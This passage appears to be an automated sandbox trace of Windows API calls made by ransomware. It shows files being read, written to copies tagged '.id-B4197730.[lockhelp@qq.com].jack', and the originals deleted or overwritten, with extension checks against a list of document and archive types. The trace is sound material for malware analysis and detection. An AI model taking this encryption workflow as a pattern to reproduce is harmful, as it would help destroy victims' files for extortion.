hFile=0x438, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.951] WriteFile (in: hFile=0x43c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xf4, lpOverlapped=0x0) returned 1 [0199.951] SetEndOfFile (hFile=0x43c) returned 1 [0199.952] CloseHandle (hObject=0x43c) returned 1 [0199.955] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.955] SetEndOfFile (hFile=0x438) returned 1 [0199.956] CloseHandle (hObject=0x438) returned 1 [0199.956] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0199.957] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi")) returned 1 [0199.957] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0199.957] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0199.957] lstrlenW (lpString=".doc") returned 4 [0199.957] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0199.957] lstrlenW (lpString=".docx") returned 5 [0199.957] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0199.957] lstrlenW (lpString=".pdf") returned 4 [0199.957] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0199.957] lstrlenW (lpString=".xls") returned 4 [0199.957] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0199.957] lstrlenW (lpString=".xlsx") returned 5 [0199.957] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0199.958] lstrlenW (lpString=".ppt") returned 4 [0199.958] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0199.958] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0199.958] lstrlenW (lpString=".zip") returned 4 [0199.958] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0199.958] lstrlenW (lpString=".rar") returned 4 [0199.958] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0199.958] lstrlenW (lpString=".bz2") returned 4 [0199.958] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0199.958] lstrlenW (lpString=".7z") returned 3 [0199.958] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0199.958] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0199.958] lstrlenW (lpString=".dbf") returned 4 [0199.958] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0199.958] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0199.958] lstrlenW (lpString=".1cd") returned 4 [0199.958] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0199.958] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0199.958] lstrlenW (lpString=".jpg") returned 4 [0199.958] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0199.958] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0199.958] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0199.958] lstrlenW (lpString=".doc") returned 4 [0199.958] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0199.958] lstrlenW (lpString=".docx") returned 5 [0199.958] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0199.959] lstrlenW (lpString=".pdf") returned 4 [0199.959] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0199.959] lstrlenW (lpString=".xls") returned 4 [0199.959] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0199.959] lstrlenW (lpString=".xlsx") returned 5 [0199.959] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0199.959] lstrlenW (lpString=".ppt") returned 4 [0199.959] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0199.959] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0199.959] lstrlenW (lpString=".zip") returned 4 [0199.959] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0199.959] lstrlenW (lpString=".rar") returned 4 [0199.959] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0199.959] lstrlenW (lpString=".bz2") returned 4 [0199.959] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0199.959] lstrlenW (lpString=".7z") returned 3 [0199.959] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0199.959] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0199.959] lstrlenW (lpString=".dbf") returned 4 [0199.959] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0199.959] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0199.959] lstrlenW (lpString=".1cd") returned 4 [0199.959] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0199.959] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0199.959] lstrlenW (lpString=".jpg") returned 4 [0199.959] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0199.960] lstrcmpiW (lpString1=".exe", lpString2=".jack") returned -1 [0199.960] lstrlenW (lpString="Setup.exe") returned 9 [0199.960] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0199.960] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=78152) returned 1 [0199.960] CloseHandle (hObject=0x438) returned 1 [0199.960] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe")) returned 0x80 [0199.960] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\setup.exe.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.960] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0199.961] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.961] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.961] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\setup.exe.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0199.961] GetLastError () returned 0x0 [0199.961] ReadFile (in: hFile=0x438, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x13148, lpOverlapped=0x0) returned 1 [0200.201] WriteFile (in: hFile=0x43c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x13150, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x13150, lpOverlapped=0x0) returned 1 [0201.394] ReadFile (in: hFile=0x438, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.394] WriteFile (in: hFile=0x43c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xe6, lpOverlapped=0x0) returned 1 [0201.394] SetEndOfFile (hFile=0x43c) returned 1 [0201.394] CloseHandle (hObject=0x43c) returned 1 [0201.396] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.397] SetEndOfFile (hFile=0x438) returned 1 [0201.398] CloseHandle (hObject=0x438) returned 1 [0201.398] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0201.399] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe")) returned 1 [0201.399] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0201.399] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0201.399] lstrlenW (lpString=".doc") returned 4 [0201.399] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0201.399] lstrlenW (lpString=".docx") returned 5 [0201.399] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0201.399] lstrlenW (lpString=".pdf") returned 4 [0201.399] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0201.399] lstrlenW (lpString=".xls") returned 4 [0201.399] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0201.399] lstrlenW (lpString=".xlsx") returned 5 [0201.399] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0201.399] lstrlenW (lpString=".ppt") returned 4 [0201.399] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0201.399] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0201.399] lstrlenW (lpString=".zip") returned 4 [0201.399] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0201.399] lstrlenW (lpString=".rar") returned 4 [0201.400] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0201.400] lstrlenW (lpString=".bz2") returned 4 [0201.400] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0201.400] lstrlenW (lpString=".7z") returned 3 [0201.400] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0201.400] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0201.400] lstrlenW (lpString=".dbf") returned 4 [0201.400] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0201.400] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0201.400] lstrlenW (lpString=".1cd") returned 4 [0201.400] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0201.400] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0201.400] lstrlenW (lpString=".jpg") returned 4 [0201.400] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0201.400] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0201.400] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0201.400] lstrlenW (lpString=".doc") returned 4 [0201.400] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0201.400] lstrlenW (lpString=".docx") returned 5 [0201.400] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0201.400] lstrlenW (lpString=".pdf") returned 4 [0201.400] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0201.400] lstrlenW (lpString=".xls") returned 4 [0201.400] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0201.400] lstrlenW (lpString=".xlsx") returned 5 [0201.400] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0201.401] lstrlenW (lpString=".ppt") returned 4 [0201.401] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0201.401] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0201.401] lstrlenW (lpString=".zip") returned 4 [0201.401] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0201.401] lstrlenW (lpString=".rar") returned 4 [0201.401] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0201.401] lstrlenW (lpString=".bz2") returned 4 [0201.401] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0201.401] lstrlenW (lpString=".7z") returned 3 [0201.401] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0201.401] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0201.401] lstrlenW (lpString=".dbf") returned 4 [0201.401] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0201.401] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0201.401] lstrlenW (lpString=".1cd") returned 4 [0201.401] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0201.401] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0201.401] lstrlenW (lpString=".jpg") returned 4 [0201.401] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0201.401] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0201.401] lstrlenW (lpString="SetupUi.dll") returned 11 [0201.402] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0201.402] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=295248) returned 1 [0201.402] CloseHandle (hObject=0x438) returned 1 [0201.402] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll")) returned 0x80 [0201.402] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\setupui.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.402] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0201.402] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.402] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.402] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\setupui.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0201.403] GetLastError () returned 0x0 [0201.403] ReadFile (in: hFile=0x438, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x48150, lpOverlapped=0x0) returned 1 [0201.422] WriteFile (in: hFile=0x43c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x48160, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x48160, lpOverlapped=0x0) returned 1 [0201.428] ReadFile (in: hFile=0x438, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.429] WriteFile (in: hFile=0x43c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xea, lpOverlapped=0x0) returned 1 [0201.429] SetEndOfFile (hFile=0x43c) returned 1 [0201.429] CloseHandle (hObject=0x43c) returned 1 [0201.731] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.731] SetEndOfFile (hFile=0x438) returned 1 [0201.734] CloseHandle (hObject=0x438) returned 1 [0201.734] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0201.734] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll")) returned 1 [0201.735] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0201.735] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0201.735] lstrlenW (lpString=".doc") returned 4 [0201.735] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0201.735] lstrlenW (lpString=".docx") returned 5 [0201.735] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0201.735] lstrlenW (lpString=".pdf") returned 4 [0201.735] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0201.735] lstrlenW (lpString=".xls") returned 4 [0201.735] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0201.735] lstrlenW (lpString=".xlsx") returned 5 [0201.735] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0201.735] lstrlenW (lpString=".ppt") returned 4 [0201.735] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0201.735] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0201.735] lstrlenW (lpString=".zip") returned 4 [0201.735] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0201.735] lstrlenW (lpString=".rar") returned 4 [0201.735] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0201.735] lstrlenW (lpString=".bz2") returned 4 [0201.735] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0201.735] lstrlenW (lpString=".7z") returned 3 [0201.735] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0201.735] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0201.735] lstrlenW (lpString=".dbf") returned 4 [0201.735] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0201.735] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0201.735] lstrlenW (lpString=".1cd") returned 4 [0201.736] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0201.736] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0201.736] lstrlenW (lpString=".jpg") returned 4 [0201.736] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0201.736] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0201.736] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0201.736] lstrlenW (lpString=".doc") returned 4 [0201.736] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0201.736] lstrlenW (lpString=".docx") returned 5 [0201.736] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0201.736] lstrlenW (lpString=".pdf") returned 4 [0201.736] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0201.736] lstrlenW (lpString=".xls") returned 4 [0201.736] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0201.736] lstrlenW (lpString=".xlsx") returned 5 [0201.736] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0201.736] lstrlenW (lpString=".ppt") returned 4 [0201.736] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0201.736] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0201.736] lstrlenW (lpString=".zip") returned 4 [0201.736] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0201.736] lstrlenW (lpString=".rar") returned 4 [0201.736] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0201.736] lstrlenW (lpString=".bz2") returned 4 [0201.736] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0201.736] lstrlenW (lpString=".7z") returned 3 [0201.736] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0201.736] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0201.736] lstrlenW (lpString=".dbf") returned 4 [0201.737] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0201.737] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0201.737] lstrlenW (lpString=".1cd") returned 4 [0201.738] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0201.738] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0201.740] lstrlenW (lpString=".jpg") returned 4 [0201.740] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0201.740] lstrcmpiW (lpString1=".msu", lpString2=".jack") returned 1 [0201.740] lstrlenW (lpString="Windows6.0-KB956250-v6001-x86.msu") returned 33 [0201.740] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0203.133] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=2192672) returned 1 [0203.133] CloseHandle (hObject=0x40c) returned 1 [0203.134] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu")) returned 0x80 [0203.134] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0203.140] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), lpNewFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu.id-b4197730.[lockhelp@qq.com].jack")) returned 1 [0203.154] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0203.154] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfc64 | out: lpNewFilePointer=0x0) returned 1 [0203.155] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfc24 | out: lpNewFilePointer=0x0) returned 1 [0203.155] ReadFile (in: hFile=0x404, lpBuffer=0x3dff058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32dfc30, lpOverlapped=0x0 | out: lpBuffer=0x3dff058*, lpNumberOfBytesRead=0x32dfc30*=0x40000, lpOverlapped=0x0) returned 1 [0203.619] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0xb270a, lpNewFilePointer=0x0, dwMoveMethod=0x32dfc24 | out: lpNewFilePointer=0x0) returned 1 [0203.619] ReadFile (in: hFile=0x404, lpBuffer=0x3e3f058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32dfc30, lpOverlapped=0x0 | out: lpBuffer=0x3e3f058*, lpNumberOfBytesRead=0x32dfc30*=0x40000, lpOverlapped=0x0) returned 1 [0203.621] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32dfc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0203.622] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x1d7520, lpNewFilePointer=0x0, dwMoveMethod=0x32dfc24 | out: lpNewFilePointer=0x0) returned 1 [0203.622] ReadFile (in: hFile=0x404, lpBuffer=0x3e7f058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32dfc30, lpOverlapped=0x0 | out: lpBuffer=0x3e7f058*, lpNumberOfBytesRead=0x32dfc30*=0x40000, lpOverlapped=0x0) returned 1 [0203.675] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0203.675] WriteFile (in: hFile=0x404, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xc012e, lpNumberOfBytesWritten=0x32dfca8, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfca8*=0xc012e, lpOverlapped=0x0) returned 1 [0203.997] SetEndOfFile (hFile=0x404) returned 1 [0203.997] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40000) returned 0x4041e30 [0203.999] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfc74 | out: lpNewFilePointer=0x0) returned 1 [0203.999] WriteFile (in: hFile=0x404, lpBuffer=0x4041e30*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32dfc80, lpOverlapped=0x0 | out: lpBuffer=0x4041e30*, lpNumberOfBytesWritten=0x32dfc80*=0x40000, lpOverlapped=0x0) returned 1 [0204.000] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0xb270a, lpNewFilePointer=0x0, dwMoveMethod=0x32dfc74 | out: lpNewFilePointer=0x0) returned 1 [0204.000] WriteFile (in: hFile=0x404, lpBuffer=0x4041e30*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32dfc80, lpOverlapped=0x0 | out: lpBuffer=0x4041e30*, lpNumberOfBytesWritten=0x32dfc80*=0x40000, lpOverlapped=0x0) returned 1 [0204.002] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x1d7520, lpNewFilePointer=0x0, dwMoveMethod=0x32dfc74 | out: lpNewFilePointer=0x0) returned 1 [0204.002] WriteFile (in: hFile=0x404, lpBuffer=0x4041e30*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32dfc80, lpOverlapped=0x0 | out: lpBuffer=0x4041e30*, lpNumberOfBytesWritten=0x32dfc80*=0x40000, lpOverlapped=0x0) returned 1 [0204.003] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4041e30 | out: hHeap=0x5e0000) returned 1 [0204.003] CloseHandle (hObject=0x404) returned 1 [0204.359] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0204.359] lstrlenW 